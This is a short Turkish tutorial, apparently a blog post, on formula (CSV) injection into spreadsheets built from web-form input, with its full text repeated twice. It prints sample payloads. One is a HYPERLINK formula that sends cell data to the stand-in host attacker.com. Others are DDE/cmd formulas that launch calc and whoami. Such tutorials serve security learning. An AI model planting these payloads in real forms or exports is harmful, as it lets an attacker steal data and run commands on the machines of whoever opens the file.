Selamlarr ben Mimikatz. Bugün sizlere çok bilinmeyen ama gayet tehlikeli ve fav açıklardan birisi olan "Formula CSV İnjection" açığından bahsedeceğim.
İlk önce excel dosyalarını anlayalım. Excel dosyalarında makrolar & komutlar vardır. Örnek.
=SUM(1 + 1) 2 çıktısını çıkarıcaktır.

Şimdi gelelim açığımıza.
En basit tanımı ile Saldırganın excel dosyalarına müdahele etmesini sağlatan bir açıktır Bir şikayet formunda genellikle veriler excel dosyasına kaydedilir. eğer siz Ad girişine =SUM(1 + 1) yazarsanız formu okuyan kişide 2 olarak görünücektir kısaca excelde olan tüm komutları "=" gibi basit bir stringsle aktifleştirebilirsiniz
Tamam mimikatz ama ne yapacağız adama 1 ile 1 mi toplatıcağız? ?
Hayır.
Web sitesine tıklattırıp sutun verileri çalınabilir=HYPERLINK("http://attacker.com/?data="&A1, "Tıkla bana") Komut CalıstırılabilirDDE("cmd";"/C calc";"!A0")=cmd|'/c whoami'!A1
Bunun gibi bir çok şey yapılabilir
-----------------------------------------------------------------------------------------------------------------------------------
DDE & CMD GİBİ KOMUTLAR İÇİN EXCEL & LİBREOFFİCEDE MAKROLAR SEÇENEĞİN AÇILMASI GEREKMEKTEDİR.)
-----------------------------------------------------------------------------------------------------------------------------------
Şimdi gelelim lab anlatımına.

Örnek bir lab var.

Basit bir payload yazdık.

Açalım.

Ve açıldı.
Zaafiyet anlatımını kısa tuttum. Nedeni eski birazcık çoğu yerde çıkmayabilir ama genel olarak excel olarak kaydeten yerlerde %70 çıkıyor. Komutlar içinde şöyle bir video bırakalım.

Okuduğunuz için Teşekkürler.
İlk önce excel dosyalarını anlayalım. Excel dosyalarında makrolar & komutlar vardır. Örnek.
=SUM(1 + 1) 2 çıktısını çıkarıcaktır.

Şimdi gelelim açığımıza.
En basit tanımı ile Saldırganın excel dosyalarına müdahele etmesini sağlatan bir açıktır Bir şikayet formunda genellikle veriler excel dosyasına kaydedilir. eğer siz Ad girişine =SUM(1 + 1) yazarsanız formu okuyan kişide 2 olarak görünücektir kısaca excelde olan tüm komutları "=" gibi basit bir stringsle aktifleştirebilirsiniz
Tamam mimikatz ama ne yapacağız adama 1 ile 1 mi toplatıcağız? ?
Hayır.
Web sitesine tıklattırıp sutun verileri çalınabilir=HYPERLINK("http://attacker.com/?data="&A1, "Tıkla bana") Komut CalıstırılabilirDDE("cmd";"/C calc";"!A0")=cmd|'/c whoami'!A1
Bunun gibi bir çok şey yapılabilir
-----------------------------------------------------------------------------------------------------------------------------------
DDE & CMD GİBİ KOMUTLAR İÇİN EXCEL & LİBREOFFİCEDE MAKROLAR SEÇENEĞİN AÇILMASI GEREKMEKTEDİR.)
-----------------------------------------------------------------------------------------------------------------------------------
Şimdi gelelim lab anlatımına.

Örnek bir lab var.

Basit bir payload yazdık.

Açalım.

Ve açıldı.
Zaafiyet anlatımını kısa tuttum. Nedeni eski birazcık çoğu yerde çıkmayabilir ama genel olarak excel olarak kaydeten yerlerde %70 çıkıyor. Komutlar içinde şöyle bir video bırakalım.

Okuduğunuz için Teşekkürler.